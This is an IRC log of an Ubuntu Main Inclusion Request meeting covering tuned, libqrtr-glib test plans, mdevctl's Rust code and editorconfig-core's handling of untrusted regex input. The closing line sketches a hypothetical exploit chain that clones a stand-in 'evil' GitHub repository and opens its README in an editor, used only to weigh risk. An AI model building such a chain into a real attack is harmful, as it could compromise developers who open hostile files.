/srv/irclogs.ubuntu.com/2022/09/20/#ubuntu-meeting.txt

sarnoldgood morning14:32
didrockshey sarnold14:32
didrockscpaelzer: joalif: jamespage: around by any chance?14:32
didrocksok, let’s co-host the meeting and go over the list sarnold and I :)14:33
didrocksthen people can join14:33
sarnold#startmeeting Weekly Main Inclusion Requests status14:34
sarnoldPing for MIR meeting - didrocks joalif slyon sarnold cpaelzer jamespage14:34
meetingologyMeeting started at 14:34:00 UTC.  The chair is sarnold.  Information about MeetBot at https://wiki.ubuntu.com/meetingology14:34
meetingologyAvailable commands: action, commands, idea, info, link, nick14:34
sarnold#topic current component mismatches14:34
sarnoldMission: Identify required actions and spread the load among the teams14:34
sarnold#link https://people.canonical.com/~ubuntu-archive/component-mismatches-proposed.svg14:34
sarnold#link https://people.canonical.com/~ubuntu-archive/component-mismatches.svg14:34
jamespageo/14:34
didrockssarnold was quicker than I getting the wiki page :)14:34
didrockslintian was false-positive, IIRC?14:34
sarnoldhey jamespage, didrocks :)14:34
didrocksesmtp too14:35
cpaelzersorry, late14:35
didrockshey jamespage, cpaelzer14:35
sarnoldhey cpaelzer :)14:35
didrockssounds like we are ok on c-m-p and c-m?14:35
cpaelzerreading backlog and thanks sarnold for driving14:35
sarnoldyeah, I think they look good \o/14:36
sarnold#topic New MIRs14:36
sarnoldMission: ensure to assign all incoming reviews for fast processing14:36
sarnold#link https://bugs.launchpad.net/ubuntu/?field.searchtext=&orderby=-date_last_updated&field.status%3Alist=NEW&field.status%3Alist=CONFIRMED&assignee_option=none&field.assignee=&field.subscriber=ubuntu-mir14:36
didrocksah, there has been some updates on tune, let’s look14:36
cpaelzerok we got an explanation on tuned14:37
cpaelzertuna was removed for now14:37
cpaelzerdo we have all answers we waited for now?14:37
cpaelzerwe also got the separataiton from tlp/gamemode14:37
cpaelzersorry for all the wrong extra characters above :-/14:37
sarnoldoh very nice, that's a good explanation of unique and new features14:38
cpaelzerindeed14:38
didrocksyeah, no feedback on the lack of automated tests though14:38
didrocksbut I can have a look at do the usual MIR review14:38
cpaelzerso "new version" and "add tests" will be requirements of the review by didrocks I guess14:38
cpaelzerbuth we can go on14:38
didrocksah nice :)14:38
cpaelzer-h14:38
didrocksah sorry, misread you14:39
cpaelzerok, so do we agree that this can go back to "new + assigned to didrocks" ?14:39
didrocksthought the new version was adding tests :)14:39
didrocksyeah14:39
didrocksdoing so14:39
cpaelzerno not yet, sorry14:39
cpaelzerbut it will have to some day before this completes14:39
cpaelzerok, bug status updated14:39
sarnoldokay, so what steps are we expecting Joseph to take before didrocks starts in on it?14:39
cpaelzerI think none14:40
didrocksI’m starting in parallel14:40
didrocksand wrote about lack of tests/new version again: https://bugs.launchpad.net/ubuntu/+source/tuned/+bug/1988066/comments/1114:40
cpaelzerwe can let him know that autopkgtests and a version update will be requirements of the reivew result14:40
ubottuLaunchpad bug 1988066 in tuned (Ubuntu Jammy) "[MIR] tuned" [High, Confirmed]14:40
didrocksso that we hopefully won’t block on it14:41
sarnoldgreat! nice comment14:41
cpaelzerack14:41
sarnold#topic Incomplete bugs / questions14:41
sarnoldMission: Identify required actions and spread the load among the teams14:41
sarnold#link https://bugs.launchpad.net/ubuntu/?field.searchtext=&orderby=-date_last_updated&field.status%3Alist=INCOMPLETE_WITH_RESPONSE&field.status%3Alist=INCOMPLETE_WITHOUT_RESPONSE&field.subscriber=ubuntu-mir14:41
cpaelzerI mentioned ccid and others last week14:42
sarnoldthe ccid and related is sadly just ray finding greening pastures :(14:42
cpaelzerwe know they are postponed for now14:42
sarnoldlibqrtr-glib is a challenging case, for discussion in prague, I think?14:42
cpaelzerdid anyone read through the updated test plan?14:42
didrockslooks like it’s directly in the bug description14:43
didrockswith "Our Desktop and oem teams don't have access to compatible hardware at the moment to go through the testplan.14:43
didrocks"14:43
cpaelzerwhich is fine14:43
cpaelzerso I feel this is a reasonable update14:43
cpaelzerwe got as much as they can do, and they are willing to continue working with other teams to improve the situation14:43
didrocksdo we think that a testplan on a bug report is going to be useful later in time?14:44
didrocksI feel it will go into $launchpad_limbo14:44
didrocksat least, on the wiki, it’s a better place, no?14:44
cpaelzerIt is a good start that they have worked on improving it, wiki does not make it better. I'd more expect "here is a script" at some point once they really tried it one. But then desktop and scripts .. :-/14:45
didrocksyou have my feeling, but I’m not going to block on this further14:46
cpaelzerMy biggest question (and I have no idea yet) is - I feel they really try, but what would we need to feel confident that the effort to get this to be testable not stops once promotion happened14:46
sarnoldmy concern is that some day we may need to do an update for a security issue, put in time and effort and then be faced with a dilemma: release an update we can't even smoke test or not provide the update at all14:46
cpaelzerEventually they will own the pain, we have forced them to work on reducing the pain14:46
cpaelzerbut indeed other teams like the one of sarnold will share the pain not being guilty of cuasing it in the first place14:47
didrocks(who will remember a test is in a bug with a fixed released status?)14:47
cpaelzernobody will, it depends on how much really happens as a consequence of "ut we are working on trying to resolve the situation"14:47
didrocksagreed14:48
cpaelzerso will there be a testflinger device early 2023 that sarnold could also use and a doc how to test14:48
cpaelzeryes => gerat14:48
cpaelzerno => not so great14:48
cpaelzerthe question is how long do we block on it14:48
cpaelzeras I said I have no great idea yet how to gain this last little bit of confidence14:48
cpaelzerthe team (desktop in this case) can sign up for their own pain14:48
cpaelzerbut as said above, how about security14:49
cpaelzersarnold: have you ever done deals like "I'm ok, but until you have FOO you need to do security yourself" or such?14:49
sarnoldme neither; we can of course lean on the desktop team in the event it becomes necessary14:49
cpaelzerthat sounds like what I asked for14:49
sarnoldcpaelzer: it reminds me a bit of the golang vendoring conversations..14:49
cpaelzeryep14:50
didrocksgood point14:50
sarnoldand unity scopes didn't go great..14:50
cpaelzeryou might add that as a comment, like "Thanks for driving towards testability, but until HW and process is available for test and verification be aware that security efforts will need you to assist them"14:50
didrockslike, I’m tracking security update for my owned vendored code (thanks dependabot!) and doing the SRUs myself because that was my decision to vendor code14:50
sarnoldvery helpful bot :) it sent me an email this morning! :)14:50
didrockssee, how pleasing :p14:51
cpaelzeryep14:51
cpaelzerwe also act on pings for e.g. our rocks images - similar situations14:51
sarnoldchances are pretty good this thing won't need a security update in the short term14:51
sarnoldso gambling on it now is liable to have mostly upsides14:51
cpaelzerok, if you add something liek the comment above sarnold - then I think we can ack them under the aforementioned conditions14:51
sarnoldbut the job of a security person is to be pessimistic most of the time. so .. I'd really like to help move things forward, but really want our concerns to be known ahead of time, that we may need someone else's time, a lot of it, at a very inconvenient time14:52
cpaelzeragreed14:53
cpaelzerand we understand that pessimism is from lessons-leaned :-)14:53
sarnoldI'll add such a comment to the bug later today, I think we can move on?14:53
cpaelzeryes14:54
cpaelzerthanks14:54
sarnold#topic MIR related Security Review Queue14:54
sarnoldMission: Check on progress, do deadlines seem doable?14:54
sarnold#link https://bugs.launchpad.net/~ubuntu-security/+bugs?field.searchtext=%5BMIR%5D&assignee_option=choose&field.assignee=ubuntu-security&field.bug_reporter=&field.bug_commenter=&field.subscriber=ubuntu-mir14:54
sarnoldInternal link14:54
sarnold- ensure your teams items are prioritized among each other as you'd expect14:54
sarnold- ensure community requests do not get stomped by teams calling for favors too much14:54
sarnold#link https://warthogs.atlassian.net/jira/software/c/projects/SEC/boards/59414:54
cpaelzerI'm biting my nails waiting for mdevctl, seeing you set the status to working this morning made me happy14:54
sarnoldheh, that was part of our mir priorities meeting, I noticed belatedly that I never moved the jira status :(14:55
cpaelzerDo you have any uplifting interim info on that sarnold?14:55
sarnoldbut the good news of that is that I had started on it ages back..14:55
didrocks(unsure how "good" this is sounding, like many problems ahead? :p)14:55
cpaelzerhehe14:55
sarnoldcpaelzer: on the one hand, it feels like a very low risk thing -- moving a shell script, any shell script, intended for admin use, to a rust program, is more or less always going to be an improvement :)14:55
cpaelzeryep14:55
sarnoldon the other hand I feel like I owe it to my colleagues to try doing some dry-run updates on it -- a small patch to a vendored dep, and lifting a vendored dep to a new version14:56
cpaelzeras I brought it up initially - a great example for discussing rust rules, but actually a good case14:56
cpaelzersarnold: as long as time does not run out, do what you have to14:56
cpaelzerathos: will be around for questions if you have any14:57
sarnoldwoot!14:57
cpaelzerbut due to time running out, could we have that completed either way until this meeting next week?14:57
sarnoldit's kind of mixed as rust code goes; it's hard for me to articulate, since I'm not myself *good* at rust, but it sure reads like someone's *first* rust project14:57
cpaelzerI'd not want to cross with the release team too much in the last week promoting this14:57
sarnoldyeah, we've already given them reason to be cranky recently.. heh14:57
cpaelzersarnold: but still, better thna shell I guess14:57
sarnoldbut yes, I think that's entirely plausible14:57
sarnoldcpaelzer: *yes*14:58
cpaelzerok, looking for next week then14:58
sarnoldeven rough rust feels like a huge improvement over the best shell14:58
cpaelzernothing else concerning in those lists14:58
cpaelzermove on?14:58
sarnoldInternal link14:58
sarnold- ensure your teams items are prioritized among each other as you'd expect14:58
sarnold- ensure community requests do not get stomped by teams calling for favors too much14:58
sarnold#link https://warthogs.atlassian.net/jira/software/c/projects/SEC/boards/59414:58
sarnoldnullboot is still sadly neglected14:58
sarnoldeditorconfig-core is still slightly blocked on my concerns that it's handing untrusted regex inputs directly to pcre14:58
sarnoldmark has been working on that, and his priorities shift wildly14:59
athos:)14:59
sarnoldand fdk-aac appears to be pleasingly low priority and filed early for next cycle :D14:59
sarnold#topic Any other business?15:00
cpaelzernothing from me15:00
sarnoldhmm, looks like we lost the meeting bot15:00
didrocksnothing either15:00
sarnoldor .. maybe it doesn't do anything? heh15:00
sarnoldnothing from me, anyway :)15:01
sarnoldokay then, without further peeps..15:01
sarnold#endmeeting15:01
meetingologyMeeting ended at 15:01:41 UTC.  Minutes at https://ubottu.com/meetingology/logs/ubuntu-meeting/2022/ubuntu-meeting.2022-09-20-14.34.moin.txt15:01
sarnoldthanks cpaelzer, didrocks :)15:01
cpaelzerthank you all!15:02
didrocksthanks sarnold for hosting, and all!15:02
jbichasarnold: Desktop was thinking about trying to bundle editorconfig-core in gnome-text-editor 43 (because it already exists in the current 42)15:04
jbichawe wouldn't want to keep that for 23.04 but in case we run out of time now…15:05
sarnoldjbicha: yeah, it's not ideal :( but gnome-text-editor feels less likely to be part of a 'git clone http://github.com/evil/evil.git ; cd evil ; $EDITOR README' exploit chain16:39

Generated by irclog2html.py 2.7 by Marius Gedminas - find it at mg.pov.lt!